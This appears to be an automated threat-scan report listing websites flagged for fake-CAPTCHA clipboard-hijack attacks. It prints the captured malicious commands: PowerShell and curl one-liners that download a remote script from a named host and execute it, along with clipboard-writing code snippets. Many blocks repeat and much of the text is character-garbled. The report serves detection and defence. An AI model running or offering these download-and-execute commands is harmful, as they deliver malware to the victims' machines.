ClickGrab Report - December 31, 2025

25

base64

6

suspicious keywords

🔍 Suspicious Keywords 6

Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering moWY[�\�_`b�ceg��di�jimo�hpquruvwy{|}~��#��-�&��)��K ��.��aZ��^��z��[��A��

invoke

.EXE

.exe

Bitmap

bitmap

🌐 Extracted URLs 13

https://github.com/MhoDialogBitmapdialogARPCONTACTWhirligigWindowsTypeNT40DisplayWindows

http://t2.symcb.com0U

http://t1.symcb.com/ThawtePCA.crl0

http://tl.symcb.com/tl.crl0U

https://www.thawte.com/cps0/+0#

7

base64

1

redirect follows

2

suspicious keywords

1

high risk

🔍 Suspicious Keywords 2

robot

hidden

🌐 Extracted URLs 414

http://brass-market.com/wp-content/uploads/2025/12/hero-1-temp-1024x684.webp

https://brass-market.com/en/

https://brass-market.com/

🛰️ Redirect Follower Findings (1)

Source: inline_js

Method: script_src

Original: https://www.googletagmanager.com/gtm.js?id=

Final: https://www.googletagmanager.com/gtm.js?id=

TagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-W

Status: ok

<!DOCTYPE html>
<html lang=en>
  <meta charset=utf-8>
  <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
  <title>Error 400 (Bad Request)!!1</title>
  <style>
    *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px ... [truncated]

https://ekoplod.pentasoftcomputers.eu

73 indicators detected

Score: 618 PowerShell Clipboard Hijack

2

powershell

6

clipboard

3

captcha

2

base64

21

suspicious keywords

2

high risk

💻 PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$h='b.ps1';$n=$env:USERPROFILE+'\\\\Downloads\\\\'+$h;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://penguinpublishers.org/files/audio/', $n);& $n;Remove-Item $n -Force;"`;

New-Object

🔍 Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;

command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;

CAPTCHA Verification

Verification ID

verification id

Ray ID

ray id

I am not a robot

Robot

robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png

https://penguinpublishers.org/files/audio/

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://173.231.199.178

71 indicators detected

Score: 575 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/blockchainkittie

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://5.35.90.28

71 indicators detected

Score: 575 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/blockchainkittie

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://66.29.142.147

71 indicators detected

Score: 575 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/blockchainkittie

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://13.213.189.252

71 indicators detected

Score: 575 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/blockchainkittie

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://5.35.124.133

71 indicators detected

Score: 575 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/blockchainkittie

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://216.92.60.125

71 indicators detected

Score: 575 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/blockchainkittie

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://5.161.254.141

71 indicators detected

Score: 575 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/blockchainkittie

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://13.58.180.189

71 indicators detected

Score: 575 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/blockchainkittie

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://18.233.234.27

71 indicators detected

Score: 575 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/blockchainkittie

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://74.208.210.81

71 indicators detected

Score: 575 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/blockchainkittie

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://159.223.94.233

71 indicators detected

Score: 575 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 6

https://t.me/blockchainkittie

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://34.23.45.74

69 indicators detected

Score: 564 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://93.127.143.163

69 indicators detected

Score: 564 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://13.233.119.235

69 indicators detected

Score: 564 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://207.154.204.54

69 indicators detected

Score: 564 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://54.76.13.162

69 indicators detected

Score: 564 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

https://admin.falconpayglobal.com

69 indicators detected

Score: 564 PowerShell Clipboard Hijack

1

powershell

6

clipboard

3

captcha

2

base64

19

suspicious keywords

💻 PowerShell Commands 1

curl

🔍 Suspicious Keywords 19

cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

CAPTCHA Verification

Verification ID

Ray ID

I am not a robot

Robot

robot

Verification

verification

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png

http://178.17.59.40:5506/qk.vbs

https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

https://icons.duckduckgo.com/ip3/${encodeURIComponent

https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....

...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

Threat Intelligence Report

Attack Pattern Analysis

Top Indicators/Keywords

Malicious Sites Detected

🔍 Suspicious Keywords 6

🌐 Extracted URLs 13

🔍 Suspicious Keywords 2

🌐 Extracted URLs 414

🛰️ Redirect Follower Findings (1)

💻 PowerShell Commands 2

🔍 Suspicious Keywords 21

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 6

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 19

🌐 Extracted URLs 5